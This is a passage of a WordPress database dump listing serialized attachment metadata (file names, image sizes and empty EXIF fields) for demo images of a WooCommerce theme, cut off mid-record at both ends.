4:\"file\";s:27:\"landing-img-5-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-600x338.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:338;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"landing-img-5-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51299,4242,'_wp_attached_file','2018/08/shop-img-30.jpg'),(51300,4242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/08/shop-img-30.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-30-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-30-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-30-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-30-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-30-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-30-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-30-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-30-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-30-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-30-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-30-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51301,4243,'_wp_attached_file','2018/08/accolades-right-img.jpg'),(51302,4241,'_wp_attachment_image_alt','l'),(51303,4243,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:987;s:4:\"file\";s:31:\"2018/08/accolades-right-img.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-233x300.jpg\";s:5:\"width\";i:233;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-768x650.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-650x987.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:987;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"accolades-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-600x771.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:771;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-600x771.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:771;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"accolades-right-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51304,282,'_wp_attached_file','2018/07/shop-img-23.jpg'),(51305,282,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:23:\"2018/07/shop-img-23.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"shop-img-23-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"shop-img-23-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:23:\"shop-img-23-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:23:\"shop-img-23-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:23:\"shop-img-23-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:23:\"shop-img-23-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:23:\"shop-img-23-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-23-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:23:\"shop-img-23-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:23:\"shop-img-23-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"shop-img-23-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51306,4239,'_wp_attachment_image_alt','c'),(51307,4244,'_wp_attached_file','2018/07/shop-sidebar-img.jpg'),(51308,4244,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2018/07/shop-sidebar-img.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:29:\"shop-sidebar-img-1000x650.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:29:\"shop-sidebar-img-650x1000.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1000;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"shop-sidebar-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"shop-sidebar-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51309,4245,'_wp_attached_file','2018/07/autor-img.png'),(51310,4245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:119;s:6:\"height\";i:118;s:4:\"file\";s:21:\"2018/07/autor-img.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"autor-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"autor-img-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51311,4245,'_wp_attachment_image_alt','g'),(51312,4245,'_wp_attachment_wp_user_avatar','2'),(51313,4240,'_wp_attachment_image_alt','x'),(51314,282,'_wp_attachment_image_alt','w'),(51315,4242,'_wp_attachment_image_alt','x'),(51316,4243,'_wp_attachment_image_alt','v'),(51317,4246,'_wp_attached_file','2018/07/h1-port-img-1.jpg'),(51318,4247,'_wp_attached_file','2018/07/shop-img-1.jpg'),(51319,4246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:1233;s:4:\"file\";s:25:\"2018/07/h1-port-img-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-195x300.jpg\";s:5:\"width\";i:195;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"h1-port-img-1-664x1024.jpg\";s:5:\"width\";i:664;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"h1-port-img-1-768x1184.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:26:\"h1-port-img-1-650x1233.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:25:\"h1-port-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-600x925.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:925;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-600x925.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:925;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:25:\"h1-port-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51320,4247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:673;s:4:\"file\";s:22:\"2018/07/shop-img-1.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"shop-img-1-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"shop-img-1-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:22:\"shop-img-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:22:\"shop-img-1-800x650.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:22:\"shop-img-1-650x673.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"shop-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"shop-img-1-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"shop-img-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"shop-img-1-600x505.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"shop-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51321,4248,'_wp_attached_file','2018/07/port-single-img-1-1.jpg'),(51322,4249,'_wp_attached_file','2018/08/footer-img-1.png'),(51323,4248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1093;s:4:\"file\";s:31:\"2018/07/port-single-img-1-1.jpg\";s:5:\"sizes\";a:13:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-300x252.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:252;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"port-single-img-1-1-1024x861.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:861;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-768x646.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:646;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-650x650.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"attika_mikado_image_landscape\";a:4:{s:4:\"file\";s:32:\"port-single-img-1-1-1300x650.jpg\";s:5:\"width\";i:1300;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:32:\"port-single-img-1-1-650x1093.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:1093;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"port-single-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-600x504.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"port-single-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51324,703,'_wp_attached_file','2018/08/accolades-content-img.jpg'),(51325,4249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:119;s:6:\"height\";i:119;s:4:\"file\";s:24:\"2018/08/footer-img-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"footer-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"footer-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51326,703,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:383;s:6:\"height\";i:224;s:4:\"file\";s:33:\"2018/08/accolades-content-img.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"accolades-content-img-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"accolades-content-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"accolades-content-img-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"accolades-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"accolades-content-img-300x224.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"accolades-content-img-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\